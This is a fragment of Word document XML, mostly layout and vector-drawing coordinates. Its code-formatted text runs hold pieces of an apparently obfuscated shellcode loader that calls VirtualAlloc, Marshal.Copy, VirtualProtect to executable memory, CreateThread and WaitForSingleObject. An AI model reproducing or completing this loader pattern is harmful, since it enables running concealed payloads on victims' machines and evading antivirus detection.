          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xd5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}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AmnGaO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VirtualAlloc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UInt32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QWKpWKhcs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0x3000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0x0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="2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2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Marshal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Copy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QWKpWKhcs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AmnGaO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QWKpWKhcs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Length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49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oXmoNUYvivZlXj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Zero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UInt32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XVXTOi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IntPtr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pAeCTf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wBS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IntPtr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Zero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uint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BnhanUiUJaetgy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;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bool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iSdNUQK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VirtualProtect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AmnGaO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0x1000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uint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0x20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out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nhanUiUJaetgy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229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52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oXmoNUYvivZlXj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CreateThread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AmnGaO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pAeCTfwBS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ref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XVXTOi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WaitForSingleObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1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oXmoNUYvivZlXj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0xFFFFFFFF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;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}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69.509pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,1390">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:1390" coordorigin="10402,0" coordsize="0,1390" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,1,10402,2,10402,2,10402,3,10402,4,10402,4,10402,5,10402,6,10402,7,10402,8,10402,10,10402,11,10402,12,10402,14,10402,16,10402,18,10402,20,10402,22,10402,24,10402,27,10402,29,10402,32,10402,35,10402,38,10402,41,10402,45,10402,48,10402,52,10402,56,10402,61,10402,65,10402,70,10402,75,10402,80,10402,85,10402,91,10402,97,10402,103,10402,109,10402,115,10402,122,10402,129,10402,137,10402,144,10402,152,10402,160,10402,169,10402,178,10402,187,10402,196,10402,206,10402,216,10402,226,10402,237,10402,248,10402,259,10402,271,10402,282,10402,295,10402,307,10402,320,10402,334,10402,348,10402,362,10402,376,10402,391,10402,406,10402,422,10402,438,10402,454,10402,471,10402,488,10402,506,10402,524,10402,543,10402,562,10402,581,10402,601,10402,621,10402,642,10402,663,10402,685,10402,707,10402,729,10402,752,10402,776,10402,800,10402,824,10402,849,10402,875,10402,901,10402,927,10402,954,10402,982,10402,1010,10402,1039,10402,1068,10402,1098,10402,1128,10402,1159,10402,1190,10402,1222,10402,1254,10402,1287,10402,1321,10402,1355,10402,1390e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:20.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,410">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:410" coordorigin="1490,970" coordsize="8990,41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999,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1006,10484,1007,10484,1008,10484,1009,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1017,10484,1018,10484,1019,10484,1021,10484,1022,10484,1024,10484,1025,10484,1027,10484,1028,10484,1030,10484,1032,10484,1034,10484,1036,10484,1038,10484,1040,10484,1042,10484,1045,10484,1047,10484,1050,10484,1052,10484,1055,10484,1057,10484,1060,10484,1063,10484,1066,10484,1069,10484,1072,10484,1076,10484,1079,10484,1082,10484,1086,10484,1090,10484,1093,10484,1097,10484,1101,10484,1105,10484,1109,10484,1114,10484,1118,10484,1123,10484,1127,10484,1132,10484,1137,10484,1142,10484,1147,10484,1152,10484,1157,10484,1163,10484,1168,10484,1174,10484,1180,10484,1186,10484,1192,10484,1198,10484,1204,10484,1211,10484,1217,10484,1224,10484,1231,10484,1238,10484,1245,10484,1253,10484,1260,10484,1268,10484,1275,10484,1283,10484,1291,10484,1299,10484,1308,10484,1316,10484,1325,10484,1334,10484,1343,10484,1352,10484,1361,10484,1370,10484,1380,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10483,1390,10482,1390,10482,1390,10480,1390,10479,1390,10477,1390,10475,1390,10473,1390,10470,1390,10466,1390,10462,1390,10458,1390,10453,1390,10448,1390,10442,1390,10435,1390,10428,1390,10419,1390,10411,1390,10401,1390,10391,1390,10379,1390,10367,1390,10354,1390,10340,1390,10326,1390,10310,1390,10293,1390,10275,1390,10256,1390,10236,1390,10215,1390,10192,1390,10168,1390,10143,1390,10117,1390,10090,1390,10061,1390,10031,1390,9999,1390,9966,1390,9931,1390,9895,1390,9858,1390,9819,1390,9778,1390,9735,1390,9691,1390,9646,1390,9598,1390,9549,1390,9498,1390,9445,1390,9391,1390,9334,1390,9275,1390,9215,1390,9153,1390,9088,1390,9022,1390,8953,1390,8883,1390,8810,1390,8735,1390,8658,1390,8578,1390,8497,1390,8413,1390,8326,1390,8238,1390,8146,1390,8053,1390,7957,1390,7859,1390,7758,1390,7654,1390,7548,1390,7439,1390,7328,1390,7214,1390,7097,1390,6977,1390,6855,1390,6730,1390,6602,1390,6471,1390,6337,1390,6201,1390,6061,1390,5918,1390,5773,1390,5624,1390,5472,1390,5317,1390,5159,1390,4997,1390,4833,1390,4665,1390,4494,1390,4319,1390,4141,1390,3960,1390,3776,1390,3587,1390,3396,1390,3201,1390,3002,1390,2800,1390,2594,1390,2385,1390,2172,1390,1955,1390,1734,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1388,1510,1388,1510,1388,1510,1388,1510,1387,1510,1387,1510,1386,1510,1386,1510,1386,1510,1385,1510,1385,1510,1384,1510,1383,1510,1383,1510,1382,1510,1381,1510,1381,1510,1380,1510,1379,1510,1378,1510,1377,1510,1376,1510,1375,1510,1374,1510,1373,1510,1371,1510,1370,1510,1369,1510,1367,1510,1366,1510,1364,1510,1362,1510,1361,1510,1359,1510,1357,1510,1355,1510,1353,1510,1351,1510,1349,1510,1347,1510,1345,1510,1342,1510,1340,1510,1337,1510,1335,1510,1332,1510,1329,1510,1326,1510,1323,1510,1320,1510,1317,1510,1314,1510,1310,1510,1307,1510,1303,1510,1300,1510,1296,1510,1292,1510,1288,1510,1284,1510,1280,1510,1276,1510,1271,1510,1267,1510,1262,1510,1257,1510,1252,1510,1247,1510,1242,1510,1237,1510,1232,1510,1226,1510,1221,1510,1215,1510,1209,1510,1203,1510,1197,1510,1191,1510,1185,1510,1178,1510,1172,1510,1165,1510,1158,1510,1151,1510,1144,1510,1137,1510,1129,1510,1122,1510,1114,1510,1106,1510,1098,1510,1090,1510,1082,1510,1073,1510,1064,1510,1056,1510,1047,1510,1038,1510,1028,1510,1019,1510,1009,1510,999e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:68.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1370" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:1370;width:8990;height:10" coordorigin="1490,1370" coordsize="8990,10" path="m1510,1382l1510,1382,1510,1382,1510,1382,1510,1382,1510,1382,1510,1382,1511,1382,1512,1382,1512,1382,1514,1382,1515,1382,1517,1382,1519,1382,1521,1382,1524,1382,1528,1382,1532,1382,1536,1382,1541,1382,1546,1382,1552,1382,1559,1382,1566,1382,1575,1382,1583,1382,1593,1382,1603,1382,1615,1382,1627,1382,1640,1382,1654,1382,1668,1382,1684,1382,1701,1382,1719,1382,1738,1382,1758,1382,1780,1382,1802,1382,1826,1382,1851,1382,1877,1382,1904,1382,1933,1382,1963,1382,1995,1382,2028,1382,2063,1382,2099,1382,2136,1382,2175,1382,2216,1382,2259,1382,2303,1382,2348,1382,2396,1382,2445,1382,2496,1382,2549,1382,2604,1382,2660,1382,2719,1382,2779,1382,2841,1382,2906,1382,2972,1382,3041,1382,3112,1382,3184,1382,3259,1382,3336,1382,3416,1382,3498,1382,3582,1382,3668,1382,3757,1382,3848,1382,3941,1382,4037,1382,4136,1382,4236,1382,4340,1382,4446,1382,4555,1382,4666,1382,4780,1382,4897,1382,5017,1382,5139,1382,5264,1382,5392,1382,5523,1382,5657,1382,5793,1382,5933,1382,6076,1382,6222,1382,6370,1382,6522,1382,6677,1382,6835,1382,6997,1382,7161,1382,7329,1382,7500,1382,7675,1382,7853,1382,8034,1382,8219,1382,8407,1382,8598,1382,8793,1382,8992,1382,9194,1382,9400,1382,9609,1382,9823,1382,10039,1382,10260,1382,10484,1382e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:48.600pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-1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54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}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